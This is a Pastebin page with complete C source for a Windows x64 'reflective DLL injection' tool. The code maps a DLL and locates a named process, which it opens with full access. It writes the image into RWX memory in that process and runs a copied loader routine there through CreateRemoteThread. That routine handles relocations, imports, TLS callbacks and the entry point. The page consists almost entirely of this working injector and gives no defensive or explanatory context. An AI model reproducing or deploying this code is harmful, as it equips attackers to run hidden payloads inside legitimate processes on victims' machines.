Advertisement
shifat627

Reflective DLL Injection Method 2

Feb 5th, 2019
3,921
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include<stdio.h>
  2. #include<windows.h>
  3. #include<dbghelp.h>
  4. #include<tlhelp32.h>
  5. #include<string.h>
  6. #pragma pack(1)
  7.  
  8. typedef struct _PE_INFO_
  9. {
  10.     BOOL Brloc;
  11.     BOOL Cleanup;
  12.     DWORD Cleanup_RVA;
  13.     LPVOID (*Get_Proc)(LPVOID , LPSTR);
  14.     LPVOID (*Load_Dll)(LPSTR);
  15.     LPVOID base;
  16. } PE_INFO , * LPE_INFO ;
  17.  
  18.  
  19. LPVOID Memory_Map_File(const char * Filename)
  20. {
  21.     HANDLE f,mmap;
  22.    
  23.    
  24.     if((f=CreateFileA(Filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL))==INVALID_HANDLE_VALUE)
  25.     {
  26.         printf("[-]Failed To Open File");
  27.         return NULL;
  28.     }
  29.    
  30.     if((mmap=CreateFileMappingA(f,NULL,PAGE_READONLY,0,0,NULL))==NULL)
  31.     {
  32.         printf("[-]CreateFileMappingA() Failed..");
  33.         return NULL;
  34.     }
  35.    
  36.     return MapViewOfFile(mmap,FILE_MAP_READ,0,0,0);
  37. }
  38.  
  39.  
  40. BOOL Find_Process(const char * Process_Name,PHANDLE p)
  41. {
  42.     PROCESSENTRY32 ps;
  43.     HANDLE Snap;
  44.     ps.dwSize=sizeof(ps);
  45.     *p=NULL;
  46.     if((Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0))==INVALID_HANDLE_VALUE)
  47.     {
  48.         printf("[-]Failed To Enumurate Process");
  49.         return FALSE;
  50.     }
  51.    
  52.     if(!Process32First(Snap,&ps))
  53.     return FALSE;
  54.    
  55.     do
  56.     {
  57.         if(!strcmp(Process_Name,ps.szExeFile))
  58.         {
  59.             CloseHandle(Snap);
  60.             *p=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);
  61.             if(*p==NULL)
  62.             return FALSE;
  63.             else
  64.             return TRUE;
  65.         }
  66.     }while(Process32Next(Snap,&ps));
  67.    
  68.     return FALSE;
  69. }
  70.  
  71. BOOL Get_Rva(LPVOID base, PIMAGE_NT_HEADERS nt, char * name,PDWORD rva)
  72. {
  73.     PIMAGE_EXPORT_DIRECTORY exp=(PIMAGE_EXPORT_DIRECTORY)ImageRvaToVa(nt,base,nt->OptionalHeader.DataDirectory[0].VirtualAddress,NULL);
  74.     PDWORD Name;
  75.     PDWORD addr;
  76.     PWORD ord;
  77.     int i;
  78.    
  79.     ord=(PWORD)ImageRvaToVa(nt,base,exp->AddressOfNameOrdinals,NULL);
  80.     Name=(PDWORD)ImageRvaToVa(nt,base,exp->AddressOfNames,NULL);
  81.     addr=(PDWORD)ImageRvaToVa(nt,base,exp->AddressOfFunctions,NULL);
  82.    
  83.     for(i=0;i<exp->NumberOfNames;i++)
  84.     {
  85.         LPSTR Func=(LPSTR)ImageRvaToVa(nt,base,Name[i],NULL);
  86.         if(!strcmp(Func,name))
  87.         {
  88.             *rva=addr[ord[i]];
  89.             return 1;
  90.         }
  91.     }
  92.  
  93.     return 0;
  94. }
  95.  
  96. void Adjust_PE(LPE_INFO pe)
  97. {
  98.     LPVOID base;
  99.     PIMAGE_DOS_HEADER dos;
  100.     PIMAGE_NT_HEADERS nt;
  101.     PIMAGE_BASE_RELOCATION rloc;
  102.     PIMAGE_TLS_DIRECTORY tls;
  103.     PIMAGE_TLS_CALLBACK * Callback;
  104.     PIMAGE_IMPORT_DESCRIPTOR imp;
  105.     PIMAGE_THUNK_DATA Othunk,Fthunk;
  106.     void (*Entry)(LPVOID , DWORD , LPVOID);
  107.    
  108.    
  109.     base=pe->base;
  110.     dos=(PIMAGE_DOS_HEADER)base;
  111.     nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
  112.    
  113.     if(!pe->Brloc)
  114.     goto Load_Import;
  115.    
  116.     Base_Reloc:
  117.         if(!nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)
  118.         goto Load_Import;
  119.        
  120.         ULONG64 delta=(ULONG64)base-nt->OptionalHeader.ImageBase;
  121.         rloc=(PIMAGE_BASE_RELOCATION)(base+nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
  122.         while(rloc->VirtualAddress)
  123.         {
  124.             LPVOID Dest=base+rloc->VirtualAddress;
  125.             int n=(rloc->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2;
  126.             int i;
  127.             PWORD data=(PWORD)((LPVOID)rloc+sizeof(IMAGE_BASE_RELOCATION));
  128.             for(i=0;i<n;i++,data++)
  129.             {
  130.                 if(((*data)>>12)==10)
  131.                 {
  132.                     PULONG64 p=(PULONG64)(Dest+((*data)&0xfff));
  133.                     *p+=delta;
  134.                 }
  135.             }
  136.             rloc=(PIMAGE_BASE_RELOCATION)((LPVOID)rloc+rloc->SizeOfBlock);
  137.         }
  138.    
  139.     Load_Import:
  140.         if(!nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)
  141.         goto TLS;
  142.        
  143.         imp=(PIMAGE_IMPORT_DESCRIPTOR)(base+nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
  144.         while(imp->Name)
  145.         {
  146.             LPVOID dll=pe->Load_Dll(base+imp->Name);
  147.             Othunk=(PIMAGE_THUNK_DATA)(base+imp->OriginalFirstThunk);
  148.             Fthunk=(PIMAGE_THUNK_DATA)(base+imp->FirstThunk);
  149.            
  150.             if(!imp->OriginalFirstThunk)
  151.             Othunk=Fthunk;
  152.            
  153.             while(Othunk->u1.AddressOfData)
  154.             {
  155.                 if(Othunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
  156.                 {
  157.                     *(PULONG64)Fthunk=(ULONG64)pe->Get_Proc(dll,(LPSTR)IMAGE_ORDINAL(Othunk->u1.Ordinal));
  158.                 }
  159.                 else
  160.                 {
  161.                     PIMAGE_IMPORT_BY_NAME fn=(PIMAGE_IMPORT_BY_NAME)(base+Othunk->u1.AddressOfData);
  162.                     *(PULONG64)Fthunk=(ULONG64)pe->Get_Proc(dll,fn->Name);
  163.                 }
  164.                 Othunk++;
  165.                 Fthunk++;
  166.             }
  167.             imp++;
  168.         }
  169.     TLS:
  170.         if(!nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress)
  171.         goto Execute_Entry;
  172.        
  173.         tls=(PIMAGE_TLS_DIRECTORY)(base+nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress);
  174.         if(!tls->AddressOfCallBacks)
  175.         goto Execute_Entry;
  176.        
  177.         Callback=(PIMAGE_TLS_CALLBACK *)tls->AddressOfCallBacks;
  178.         while(*Callback)
  179.         {
  180.             (*Callback)(base,1,NULL);
  181.             Callback++;
  182.         }
  183.        
  184.     Execute_Entry:
  185.         if(pe->Cleanup)
  186.         {
  187.             Entry=(base+pe->Cleanup_RVA);
  188.             (*Entry)(base,nt->OptionalHeader.AddressOfEntryPoint,pe);
  189.         }
  190.         else
  191.         {
  192.             Entry=(base+nt->OptionalHeader.AddressOfEntryPoint);
  193.             (*Entry)(base,1,NULL);
  194.         }
  195.    
  196. }
  197.  
  198.  
  199. int main(int i,char *arg[])
  200. {
  201.     LPVOID base,Rbase;
  202.     PIMAGE_DOS_HEADER dos;
  203.     PIMAGE_NT_HEADERS nt;
  204.     PIMAGE_SECTION_HEADER sec;
  205.     HANDLE proc;PE_INFO pe;
  206.    
  207.     if(i!=3)
  208.     {
  209.         printf("[!]Usage %s <DLL> <Process Name>",arg[0]);
  210.         return 1;
  211.     }
  212.    
  213.     if((base=Memory_Map_File(arg[1]))==NULL)
  214.     {
  215.         printf("[-]Failed To Memory Map File");
  216.         return 1;
  217.     }
  218.    
  219.     printf("[+]File is Memory Mapped Successfully\n");
  220.    
  221.     ZeroMemory(&pe,sizeof(pe));
  222.    
  223.     dos=(PIMAGE_DOS_HEADER)base;
  224.    
  225.     if(dos->e_magic!=23117)
  226.     {
  227.         printf("\n[-]Invalid PE");
  228.         return 1;
  229.     }
  230.    
  231.     nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
  232.    
  233.     if(nt->OptionalHeader.Magic!=IMAGE_NT_OPTIONAL_HDR64_MAGIC)
  234.     {
  235.         printf("[-]Please use x64 PE");
  236.         return 1;
  237.     }
  238.    
  239.    
  240.     if(!Find_Process(arg[2],&proc))
  241.     {
  242.         printf("\n[-]Failed To Open Process");
  243.         return 1;
  244.     }
  245.     else
  246.     printf("[+]\'%s\' is Openned\n",arg[2]);
  247.      
  248.     printf("[!]Allocating Memory Into \'%s\'\n",arg[2]);
  249.      
  250.      
  251.      
  252.     if((Rbase=VirtualAllocEx(proc,(LPVOID)nt->OptionalHeader.ImageBase,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE ,PAGE_EXECUTE_READWRITE))==NULL)
  253.     {
  254.         pe.Brloc=TRUE;
  255.         if((Rbase=VirtualAllocEx(proc,NULL,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE ,PAGE_EXECUTE_READWRITE))==NULL)
  256.         {
  257.             printf("\n[-]Failed To Allocate Memory Into Remote Process");
  258.             CloseHandle(proc);
  259.             return 1;
  260.         }
  261.     }
  262.    
  263.     printf("\n[+]Copying File Content into Remote Process\n");
  264.    
  265.     WriteProcessMemory(proc,Rbase,base,nt->OptionalHeader.SizeOfHeaders,NULL);
  266.    
  267.     sec=(PIMAGE_SECTION_HEADER)((LPVOID)nt+sizeof(IMAGE_NT_HEADERS));
  268.    
  269.     for(i=0;i<nt->FileHeader.NumberOfSections;i++)
  270.     {
  271.         WriteProcessMemory(proc,Rbase+sec->VirtualAddress,base+sec->PointerToRawData,sec->SizeOfRawData,NULL);
  272.         sec++;
  273.     }  
  274.        
  275.     pe.base=Rbase;
  276.     pe.Get_Proc=GetProcAddress;
  277.     pe.Load_Dll=LoadLibraryA;
  278.    
  279.     if(Get_Rva(base,nt,"_PE_CLEANUP",&pe.Cleanup_RVA))
  280.     {
  281.         pe.Cleanup=TRUE;
  282.     }
  283.    
  284.    
  285.     DWORD len=(DWORD)((ULONG64)main-(ULONG64)Adjust_PE);
  286.     LPVOID temp=VirtualAllocEx(proc,NULL,len+sizeof(pe),MEM_COMMIT | MEM_RESERVE , PAGE_EXECUTE_READWRITE);
  287.     if(temp==NULL)
  288.     {
  289.         printf("\n[-]Insufficiant Memory For PE Configurator\n");
  290.         VirtualFreeEx(proc,Rbase,0,MEM_RELEASE);
  291.         return 1;
  292.     }
  293.    
  294.    
  295.     WriteProcessMemory(proc,temp,&pe,sizeof(pe),NULL);
  296.     WriteProcessMemory(proc,temp+sizeof(pe),Adjust_PE,len,NULL);
  297.    
  298.     printf("\n[+]Configuring PE and Executing...");
  299.     if(!CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)temp+sizeof(pe),temp,0,NULL))
  300.     {
  301.         printf("\n[-]Failed To Create Thread..");VirtualFreeEx(proc,Rbase,0,MEM_RELEASE);
  302.         return 1;
  303.     }
  304.     CloseHandle(proc);
  305.     return 0;
  306. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement